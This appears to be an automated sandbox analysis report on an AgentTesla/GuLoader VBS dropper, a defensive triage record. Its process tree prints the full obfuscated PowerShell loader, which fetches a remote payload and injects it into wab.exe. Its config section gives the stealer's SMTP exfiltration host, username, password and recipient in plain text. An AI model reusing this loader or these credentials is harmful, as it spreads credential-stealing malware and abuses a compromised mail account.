Overview

overview

10

Static

static

1

26b773de9b...3c.vbs

windows7-x64

10

26b773de9b...3c.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 01:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs

  • Size

    210KB

  • MD5

    cc706991e70caa76595bf08fc59bc6a1

  • SHA1

    1172135bb6eafef9633db0ae5f818366a1515e8a

  • SHA256

    26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c

  • SHA512

    3528e82039587e51e9d2e96a99f76941e4077161a3782b3fe4fd0cb7d7f2125a0844554e77c6de7408a0ee3da02e487ec1746465c9f0a3c30222e78a1093e476

  • SSDEEP

    6144:DYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfkqZD:A2dOB2mTJ

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.bresciagrameen.lk
  • Port:
    587
  • Username:
    info@bresciagrameen.lk
  • Password:
    #S413vT0u45#
  • Email To:
    officejay@yandex.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gevandter = 1;$Versifiable='Substrin';$Versifiable+='g';Function Rivalitet($Slavistens){$Vitiliginous=$Slavistens.Length-$gevandter;For($Forndenhedernes=5; $Forndenhedernes -lt $Vitiliginous; $Forndenhedernes+=(6)){$Sandaflejringerne+=$Slavistens.$Versifiable.Invoke($Forndenhedernes, $gevandter);}$Sandaflejringerne;}function Snkloddene($Bypladser){& ($Pimple) ($Bypladser);}$Doweries=Rivalitet ' FlanM HearoSu jazridebiTe.milS riflFllesaDesti/.dvin5D,shf. Bact0Virks Un r(kvlstWOrdreiF.lisnPassed FlyvoGeno.wpamfisNonra NyansNOrdstT Befl Palat1jgers0Bech..Tumbl0Eeyu.;Nonra Tha aWAkantiTilgonCaque6 blon4Relib;Refer HighbxPla a6Tenzo4Mi.jk;Code, cen rBildrv uldv:Li.en1 Palp2 Test1snude.Cat,p0Fanat)Forva InterGVldese L,gocSkudlkHalvmo Trol/ I te2Dass,0Aubri1Rumpi0r.tio0Balle1 St e0 Becl1 H.nn BarkoFTi.maiTar,or Af ie.eritfEuryzoFiltex.nkek/Epico1Lymph2.nani1S.edi.Draws0Midsh ';$Overfondling=Rivalitet 'InterU E.sas Rec,e orflraltsa- svenATemp gSvmmeeDrinkn Un.otam.ly ';$Reshow=Rivalitet 'heelmhKa,ontBran tGaderpWildfs Misf:Bilob/G.niz/OrdstdWaffirClinoiAfpr.vRep teta,ke.VidergStikdoBlundoStemngExorclAppoie.rain.Veranc HestoKnudem Ldig/Se,rauFagm.cT,vyr?Da,apeSiliqxSa,cop UnproverrurTillitSilve=ElektdArresoEscorwTopafnProtel E eto tilgaAnimad Enri& ommicountdBeame=K,nto1FremdxHalvfJMaffil.kraaWApo,tR stenn Puls9Drue.kSljdmaSnf.sSFo.bioAnret6 My.h8BommeFTa tey ,relNDrageMT ansQTagudvPersol Kend6,ourw4S.linR MascXTids C OverMRacecEShadoeMnemobQuittPHindeZ Di,igglumm ';$Forbundsformanden=Rivalitet 'Circu>Indek ';$Pimple=Rivalitet 'dechriF.udae FormxAspir ';$Kathisma = Rivalitet '.bsene.aluscPy,pahUnre.o Cand Mlke% AdviaDominpTranspf,resdEftera Ac utE,itoaMaju,%Deval\CysteWPindboAugurm Ecphmc lorahjnenlGuttiaR nte. Aq.iG.uddilTvangyVolca A tim&Ops,i&Pre i .mproeFiss cSekunhPiscao Inte Trian$ouche ';Snkloddene (Rivalitet 'Nonar$ Emi.gTher lUdg.ao FlanbHypera Skovl Luft:BrachBMani.oA orem,esvabGigtreUspildYoutheSigna=Befoe(t angcN.tnimdestrdNyisg bagtr/wotanckvind Skalp$Ra,piKKons.aHemeltSca,bhMuscaiBegr.suds em .uroaFilmm)Advar ');Snkloddene (Rivalitet 'Udgif$PorengChesslF,oweoKrngebHoveda H lnlHulse:.ntrobGgesnaIn vid,alefoTrutsg,yllal Amali.uelloChack=Somac$AxileRMislieS gnis Tr nhUza ooPttofwGldes.Gas,rsUdkaapOpg vl,opmai KaratLeges(Card,$UnsnaF ForkoTransrStr.pbUngaruChausnMelledFlyvesBa krfScenoo ToilrNondomHammaatailonH lvidUdvkse PlacnBelee)Frei ');$Reshow=$badoglio[0];Snkloddene (Rivalitet 'Huiaa$ Bogog Ro,tl ArveoThickbUforkaJ.rdflO.lrs:Cua.iDAmpleeD tamcUn tai Modem UndeamindslCountf TritoAfbryrM,rtimDagsp2 Navn0 s.kt6 te,s=SanctNFornue Pho wKoag,- AnthOMorbib ForhjStr.feCompoc Pat.tLngse TospaS Bes.y Ethys InvitGenereDocummPaste.Merm.NUdhvneKulaitGlims.S ybiWInfane.odulbYawleCShitelBiomeiBarkaeSenionS,kketVldi, ');Snkloddene (Rivalitet 'klven$ SnigDWheree.yttecCr,isiGenanm.narta Forbl KulrfOv,rfoGnidnrAkkormSt,au2Figur0Anbe.6 B.gg.Wie eHFlyveeHypera BasidMatrieH,ererOverqs Outg[.luto$UngreOUdt yvArti.e.mpasrForrefFygedoLaengnMete,dBeundl Un.eiViduin DuvegMusca]Cruse=Milie$CoappDAgitpoStiftwSolbleComparStoleiSli.aeT.tussTaktr ');$coffeeweed=Rivalitet 'HaartDUide.euntemc,anmaiMaskimSchema.ninql mmigfPhenyoUlminr FolkmAu is2Konvu0For.a6 kyde.,sperD,alakolumpiwKrepon Tal.lDrejnoSt tsaPoisodLse,dFSkrmaiOrnamlSub oe Sc o(Apsid$ ibboRBur aeudenrsFagfohS,nuso Ba,rwCam,h,Borte$DreadR S ile.agskn ontrh HeateIrritdPrixbsLibidgMiljprOve uaca,ild Ochr) Gges ';$coffeeweed=$Bombede[1]+$coffeeweed;$Renhedsgrad=$Bombede[0];Snkloddene (Rivalitet 'Subfi$boli,gN.ntal Sat oRrknob,ardeaOpsiglPolyn:Ent,eNEmphau s ikkOveralUdadleSammeiH.spin Prdis dagsy.onunrUn caeTr dj=Mouss( WearTSk.mbe Bes,sPachatMorfi-E traPNedsiaJacquthumpbhNonse Ratte$ UndiR EvoleOkkupn Tn eh Gl,demop sdSeptisRepregHilderFolk aH,veddGodke) St e ');while (!$Nukleinsyre) {Snkloddene (Rivalitet 'Overs$an lygPebbllSeedyoSynlibvarteaBiddylMyres:VengeFTimefrK.mbup Frk eBlokbrF jlasProgrpIldste,nintkOverst DolliAlderv SkrusNedgr=Frin $ olyet Sk,fr Holdu F rle terl ') ;Snkloddene $coffeeweed;Snkloddene (Rivalitet ' TimeSPre,atDemataFug,er Pr ntVeeja-ForemSC,rysl Knuse AmpeeKompopBoule F,ber4Altng ');Snkloddene (Rivalitet ' Redu$StenggTankelZ.chio SanabIodimainfefl Calv:E levN,ndenu S,lvkScopelAutoceNeuroi Tu,anUnre sSc,nay ocir Yasmeracia=Colt.(Bah.iTUtidie StivsGang td,per-vi erPSensuaOverbtSmidih Lage Myrde$ Ko,nRGing,e eson ,porhS,rupeburrhdUnmetsSparogKa.rerN.gsla,nemod vige)Unfin ') ;Snkloddene (Rivalitet 'U adv$ RhingKlauslDe,enoNoncobDiacha Un.ulKvrul:Trsk FTitieiTje elJezeki ScursmiddltKonstrBlomseMeanw=Tykke$SpiongDaa,al Decio ,agabM,llya SirelDissi: exc,BSpikeicoatisPreposRemiteSemistBortv+Prehu+.onas%D.ske$Kolo bMenopaMunimdBetonoUnresg depul HaaniHidseo,eter.KysercPrinto tdpuuFo esnVagtttUtryg ') ;$Reshow=$badoglio[$Filistre];}Snkloddene (Rivalitet 'Karak$Setong malilRockeo Medlb No saServilRenaw:AutenSBin.stTillgeSolubd afsloBuks.rKare dBetonsFjerda KonvgFor,ltStikpiTrebegElexieu.embschrys El.ct=Betul GangaGEnogte KinktPrere-ProgrC SmrhoUnd rnRedsktorkeseKlvernSpectt Hype wate,$Ag osRTrolleJocoqn StonhTostaeZonopdfyrassMuldzg G,asrMata aSpinddUnecs ');Snkloddene (Rivalitet 'Rynke$ Svalg SocilIntero Lin,bUruguaAntiplBnhre:Age,eMGuffeiNighncChlamh SporeDyrlgl Con,l Chik Emiss= ,ndi reh.[ForelSLit ey Moo.sSimultIronieLacerm Euch.RefinC,lackoInc.en arrevBilabeBygnirSvovltSt.ko]Yacht:Skrum:,abovFOlivirSolenoU,dtam SkolBHabi aRo dbsFlgereOutro6Iso p4FuggiS.onint,nhonrSchooiGrundn Mic.g Vale( Sig,$ KoncSKlas,tHo lne PsykdSepp,o UdbrrBerridArylasSn.giaL.echgBe.tnt IndkiParaig wa.eeenglisWhats)Mysli ');Snkloddene (Rivalitet 'Merka$Li.pigVi,lll OuvroLedigbDemobaK.rtolPr,xi:BusavTAp enw LiszimoralganthrgGalloiBom.le DakssCounttKv.er Debar= Rela Role[ No.cS LdreyCas asI.dretPerv,e SjusmSkri .CamioTU,sheeForesximpertthgek.BetumEVas.enHideac usikobraisd To.ri Forpn FejlgIdol ]Antiq:gynae: PirrAfatemSPelodCEgoisIani aI nifo.UdaanG UnapeNo fetpseudS RepetH verrSmalbiAnomanpi tig Gumm(Rsonn$IndhaMNstekinondecLyspahBukseeBacbal TritlPyrom)Helau ');Snkloddene (Rivalitet 'Forld$SkabmgHospilR.tuaophenobCom,taDruntlFaths:TrappNKilotaPs,udtSk.ldu ikkerLithafBed to SpinrD sule c stkAppinoHornbmHo insCu.tstdisdes latl=Jarra$FliesT RebewHomogiRu legBrinegForbui Merce Dem,s AnlgtThrou.Topp sOvervu amtb Blits AnagtMartyrVis iiDemisnF.rhagRntge( Co.m3,perr2 Firs9E,pre3Sanit0Paape0Anve,,Udmrk2Jensk9Pub v2Unint0 Deli0Furb )Stand ');Snkloddene $Naturforekomsts;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4824
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"
        3⤵
          PID:972
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gevandter = 1;$Versifiable='Substrin';$Versifiable+='g';Function Rivalitet($Slavistens){$Vitiliginous=$Slavistens.Length-$gevandter;For($Forndenhedernes=5; $Forndenhedernes -lt $Vitiliginous; $Forndenhedernes+=(6)){$Sandaflejringerne+=$Slavistens.$Versifiable.Invoke($Forndenhedernes, $gevandter);}$Sandaflejringerne;}function Snkloddene($Bypladser){& ($Pimple) ($Bypladser);}$Doweries=Rivalitet ' FlanM HearoSu jazridebiTe.milS riflFllesaDesti/.dvin5D,shf. Bact0Virks Un r(kvlstWOrdreiF.lisnPassed FlyvoGeno.wpamfisNonra NyansNOrdstT Befl Palat1jgers0Bech..Tumbl0Eeyu.;Nonra Tha aWAkantiTilgonCaque6 blon4Relib;Refer HighbxPla a6Tenzo4Mi.jk;Code, cen rBildrv uldv:Li.en1 Palp2 Test1snude.Cat,p0Fanat)Forva InterGVldese L,gocSkudlkHalvmo Trol/ I te2Dass,0Aubri1Rumpi0r.tio0Balle1 St e0 Becl1 H.nn BarkoFTi.maiTar,or Af ie.eritfEuryzoFiltex.nkek/Epico1Lymph2.nani1S.edi.Draws0Midsh ';$Overfondling=Rivalitet 'InterU E.sas Rec,e orflraltsa- svenATemp gSvmmeeDrinkn Un.otam.ly ';$Reshow=Rivalitet 'heelmhKa,ontBran tGaderpWildfs Misf:Bilob/G.niz/OrdstdWaffirClinoiAfpr.vRep teta,ke.VidergStikdoBlundoStemngExorclAppoie.rain.Veranc HestoKnudem Ldig/Se,rauFagm.cT,vyr?Da,apeSiliqxSa,cop UnproverrurTillitSilve=ElektdArresoEscorwTopafnProtel E eto tilgaAnimad Enri& ommicountdBeame=K,nto1FremdxHalvfJMaffil.kraaWApo,tR stenn Puls9Drue.kSljdmaSnf.sSFo.bioAnret6 My.h8BommeFTa tey ,relNDrageMT ansQTagudvPersol Kend6,ourw4S.linR MascXTids C OverMRacecEShadoeMnemobQuittPHindeZ Di,igglumm ';$Forbundsformanden=Rivalitet 'Circu>Indek ';$Pimple=Rivalitet 'dechriF.udae FormxAspir ';$Kathisma = Rivalitet '.bsene.aluscPy,pahUnre.o Cand Mlke% AdviaDominpTranspf,resdEftera Ac utE,itoaMaju,%Deval\CysteWPindboAugurm Ecphmc lorahjnenlGuttiaR nte. Aq.iG.uddilTvangyVolca A tim&Ops,i&Pre i .mproeFiss cSekunhPiscao Inte Trian$ouche ';Snkloddene (Rivalitet 'Nonar$ Emi.gTher lUdg.ao FlanbHypera Skovl Luft:BrachBMani.oA orem,esvabGigtreUspildYoutheSigna=Befoe(t angcN.tnimdestrdNyisg bagtr/wotanckvind Skalp$Ra,piKKons.aHemeltSca,bhMuscaiBegr.suds em .uroaFilmm)Advar ');Snkloddene (Rivalitet 'Udgif$PorengChesslF,oweoKrngebHoveda H lnlHulse:.ntrobGgesnaIn vid,alefoTrutsg,yllal Amali.uelloChack=Somac$AxileRMislieS gnis Tr nhUza ooPttofwGldes.Gas,rsUdkaapOpg vl,opmai KaratLeges(Card,$UnsnaF ForkoTransrStr.pbUngaruChausnMelledFlyvesBa krfScenoo ToilrNondomHammaatailonH lvidUdvkse PlacnBelee)Frei ');$Reshow=$badoglio[0];Snkloddene (Rivalitet 'Huiaa$ Bogog Ro,tl ArveoThickbUforkaJ.rdflO.lrs:Cua.iDAmpleeD tamcUn tai Modem UndeamindslCountf TritoAfbryrM,rtimDagsp2 Navn0 s.kt6 te,s=SanctNFornue Pho wKoag,- AnthOMorbib ForhjStr.feCompoc Pat.tLngse TospaS Bes.y Ethys InvitGenereDocummPaste.Merm.NUdhvneKulaitGlims.S ybiWInfane.odulbYawleCShitelBiomeiBarkaeSenionS,kketVldi, ');Snkloddene (Rivalitet 'klven$ SnigDWheree.yttecCr,isiGenanm.narta Forbl KulrfOv,rfoGnidnrAkkormSt,au2Figur0Anbe.6 B.gg.Wie eHFlyveeHypera BasidMatrieH,ererOverqs Outg[.luto$UngreOUdt yvArti.e.mpasrForrefFygedoLaengnMete,dBeundl Un.eiViduin DuvegMusca]Cruse=Milie$CoappDAgitpoStiftwSolbleComparStoleiSli.aeT.tussTaktr ');$coffeeweed=Rivalitet 'HaartDUide.euntemc,anmaiMaskimSchema.ninql mmigfPhenyoUlminr FolkmAu is2Konvu0For.a6 kyde.,sperD,alakolumpiwKrepon Tal.lDrejnoSt tsaPoisodLse,dFSkrmaiOrnamlSub oe Sc o(Apsid$ ibboRBur aeudenrsFagfohS,nuso Ba,rwCam,h,Borte$DreadR S ile.agskn ontrh HeateIrritdPrixbsLibidgMiljprOve uaca,ild Ochr) Gges ';$coffeeweed=$Bombede[1]+$coffeeweed;$Renhedsgrad=$Bombede[0];Snkloddene (Rivalitet 'Subfi$boli,gN.ntal Sat oRrknob,ardeaOpsiglPolyn:Ent,eNEmphau s ikkOveralUdadleSammeiH.spin Prdis dagsy.onunrUn caeTr dj=Mouss( WearTSk.mbe Bes,sPachatMorfi-E traPNedsiaJacquthumpbhNonse Ratte$ UndiR EvoleOkkupn Tn eh Gl,demop sdSeptisRepregHilderFolk aH,veddGodke) St e ');while (!$Nukleinsyre) {Snkloddene (Rivalitet 'Overs$an lygPebbllSeedyoSynlibvarteaBiddylMyres:VengeFTimefrK.mbup Frk eBlokbrF jlasProgrpIldste,nintkOverst DolliAlderv SkrusNedgr=Frin $ olyet Sk,fr Holdu F rle terl ') ;Snkloddene $coffeeweed;Snkloddene (Rivalitet ' TimeSPre,atDemataFug,er Pr ntVeeja-ForemSC,rysl Knuse AmpeeKompopBoule F,ber4Altng ');Snkloddene (Rivalitet ' Redu$StenggTankelZ.chio SanabIodimainfefl Calv:E levN,ndenu S,lvkScopelAutoceNeuroi Tu,anUnre sSc,nay ocir Yasmeracia=Colt.(Bah.iTUtidie StivsGang td,per-vi erPSensuaOverbtSmidih Lage Myrde$ Ko,nRGing,e eson ,porhS,rupeburrhdUnmetsSparogKa.rerN.gsla,nemod vige)Unfin ') ;Snkloddene (Rivalitet 'U adv$ RhingKlauslDe,enoNoncobDiacha Un.ulKvrul:Trsk FTitieiTje elJezeki ScursmiddltKonstrBlomseMeanw=Tykke$SpiongDaa,al Decio ,agabM,llya SirelDissi: exc,BSpikeicoatisPreposRemiteSemistBortv+Prehu+.onas%D.ske$Kolo bMenopaMunimdBetonoUnresg depul HaaniHidseo,eter.KysercPrinto tdpuuFo esnVagtttUtryg ') ;$Reshow=$badoglio[$Filistre];}Snkloddene (Rivalitet 'Karak$Setong malilRockeo Medlb No saServilRenaw:AutenSBin.stTillgeSolubd afsloBuks.rKare dBetonsFjerda KonvgFor,ltStikpiTrebegElexieu.embschrys El.ct=Betul GangaGEnogte KinktPrere-ProgrC SmrhoUnd rnRedsktorkeseKlvernSpectt Hype wate,$Ag osRTrolleJocoqn StonhTostaeZonopdfyrassMuldzg G,asrMata aSpinddUnecs ');Snkloddene (Rivalitet 'Rynke$ Svalg SocilIntero Lin,bUruguaAntiplBnhre:Age,eMGuffeiNighncChlamh SporeDyrlgl Con,l Chik Emiss= ,ndi reh.[ForelSLit ey Moo.sSimultIronieLacerm Euch.RefinC,lackoInc.en arrevBilabeBygnirSvovltSt.ko]Yacht:Skrum:,abovFOlivirSolenoU,dtam SkolBHabi aRo dbsFlgereOutro6Iso p4FuggiS.onint,nhonrSchooiGrundn Mic.g Vale( Sig,$ KoncSKlas,tHo lne PsykdSepp,o UdbrrBerridArylasSn.giaL.echgBe.tnt IndkiParaig wa.eeenglisWhats)Mysli ');Snkloddene (Rivalitet 'Merka$Li.pigVi,lll OuvroLedigbDemobaK.rtolPr,xi:BusavTAp enw LiszimoralganthrgGalloiBom.le DakssCounttKv.er Debar= Rela Role[ No.cS LdreyCas asI.dretPerv,e SjusmSkri .CamioTU,sheeForesximpertthgek.BetumEVas.enHideac usikobraisd To.ri Forpn FejlgIdol ]Antiq:gynae: PirrAfatemSPelodCEgoisIani aI nifo.UdaanG UnapeNo fetpseudS RepetH verrSmalbiAnomanpi tig Gumm(Rsonn$IndhaMNstekinondecLyspahBukseeBacbal TritlPyrom)Helau ');Snkloddene (Rivalitet 'Forld$SkabmgHospilR.tuaophenobCom,taDruntlFaths:TrappNKilotaPs,udtSk.ldu ikkerLithafBed to SpinrD sule c stkAppinoHornbmHo insCu.tstdisdes latl=Jarra$FliesT RebewHomogiRu legBrinegForbui Merce Dem,s AnlgtThrou.Topp sOvervu amtb Blits AnagtMartyrVis iiDemisnF.rhagRntge( Co.m3,perr2 Firs9E,pre3Sanit0Paape0Anve,,Udmrk2Jensk9Pub v2Unint0 Deli0Furb )Stand ');Snkloddene $Naturforekomsts;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"
            4⤵
              PID:1740
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3328
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 2292
                5⤵
                • Program crash
                PID:4512
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3328 -ip 3328
        1⤵
          PID:2360

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Web Service

        1
        T1102

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obvzi2wn.yx5.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Wommala.Gly
          Filesize

          466KB

          MD5

          857ebc337f5b8e4103e4ba6bb5eac6b6

          SHA1

          fc0153dd335c59293a2a2fb3455fb05b59253bd2

          SHA256

          fbef3e8ddfb38a27db63e01cd92e02a59b163f6088ced67c3e4b01f16c5e53e2

          SHA512

          b26df0793d9763e9e88bd59e34a5187d7b48101a91647b312b8212b15ab7227327df7913f0c03dd2c9cfff4cb1c99c4846cf88431e09ffe9cdfcc201e9f304f5

          Download Submit
        • memory/3328-85-0x00000000749C0000-0x0000000075170000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3328-83-0x0000000001AF0000-0x0000000002BE9000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3328-78-0x0000000020960000-0x0000000020970000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3328-76-0x0000000000890000-0x00000000008D2000-memory.dmp
          Filesize

          264KB

          Download
        • memory/3328-75-0x00000000749C0000-0x0000000075170000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3328-73-0x00000000773E1000-0x0000000077501000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/3328-72-0x0000000000890000-0x0000000001AE4000-memory.dmp
          Filesize

          18.3MB

          Download
        • memory/3328-59-0x00000000773E1000-0x0000000077501000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/3328-57-0x0000000077468000-0x0000000077469000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3328-56-0x0000000001AF0000-0x0000000002BE9000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3908-58-0x0000000009250000-0x000000000A349000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3908-50-0x00000000749C0000-0x0000000075170000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3908-35-0x0000000006830000-0x000000000684E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/3908-36-0x0000000006D80000-0x0000000006DCC000-memory.dmp
          Filesize

          304KB

          Download
        • memory/3908-37-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-38-0x0000000008070000-0x00000000086EA000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/3908-39-0x0000000006D50000-0x0000000006D6A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/3908-40-0x0000000007AD0000-0x0000000007B66000-memory.dmp
          Filesize

          600KB

          Download
        • memory/3908-41-0x0000000007A60000-0x0000000007A82000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3908-42-0x0000000008CA0000-0x0000000009244000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/3908-24-0x00000000060A0000-0x0000000006106000-memory.dmp
          Filesize

          408KB

          Download
        • memory/3908-77-0x0000000009250000-0x000000000A349000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3908-17-0x00000000749C0000-0x0000000075170000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3908-47-0x0000000007D60000-0x0000000007D61000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3908-74-0x00000000749C0000-0x0000000075170000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3908-48-0x0000000009250000-0x000000000A349000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3908-49-0x0000000009250000-0x000000000A349000-memory.dmp
          Filesize

          17.0MB

          Download
        • memory/3908-30-0x00000000061D0000-0x0000000006524000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/3908-52-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-53-0x00000000773E1000-0x0000000077501000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/3908-54-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-55-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-23-0x0000000006030000-0x0000000006096000-memory.dmp
          Filesize

          408KB

          Download
        • memory/3908-22-0x0000000005940000-0x0000000005962000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3908-18-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-21-0x0000000005990000-0x0000000005FB8000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/3908-20-0x0000000005350000-0x0000000005360000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3908-19-0x0000000005240000-0x0000000005276000-memory.dmp
          Filesize

          216KB

          Download
        • memory/4824-2-0x0000020638910000-0x0000020638932000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4824-46-0x0000020638900000-0x0000020638910000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4824-45-0x0000020638900000-0x0000020638910000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4824-44-0x00007FFDAC330000-0x00007FFDACDF1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4824-14-0x0000020638900000-0x0000020638910000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4824-81-0x00007FFDAC330000-0x00007FFDACDF1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4824-13-0x0000020638900000-0x0000020638910000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4824-12-0x00007FFDAC330000-0x00007FFDACDF1000-memory.dmp
          Filesize

          10.8MB

          Download